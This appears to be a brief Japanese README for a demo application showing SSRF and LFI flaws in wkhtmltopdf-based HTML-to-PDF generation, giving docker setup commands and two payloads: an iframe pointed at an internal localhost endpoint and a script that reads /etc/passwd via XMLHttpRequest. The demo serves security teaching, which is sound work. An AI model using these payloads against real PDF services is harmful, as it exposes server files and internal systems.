HTMLをベースとするPDF生成処理に発生するSSRFやLFIの脆弱性に関するデモアプリケーション
$ cd wkhtmltopdf
$ docker compose up- SSRF
<iframe src="http://localhost:5000/internal"></iframe>- LFI
<script>
xhr = new XMLHttpRequest();
xhr.open("GET", "file:///etc/passwd");
xhr.onload = function(){
document.write(this.responseText)
};
xhr.send();
</script>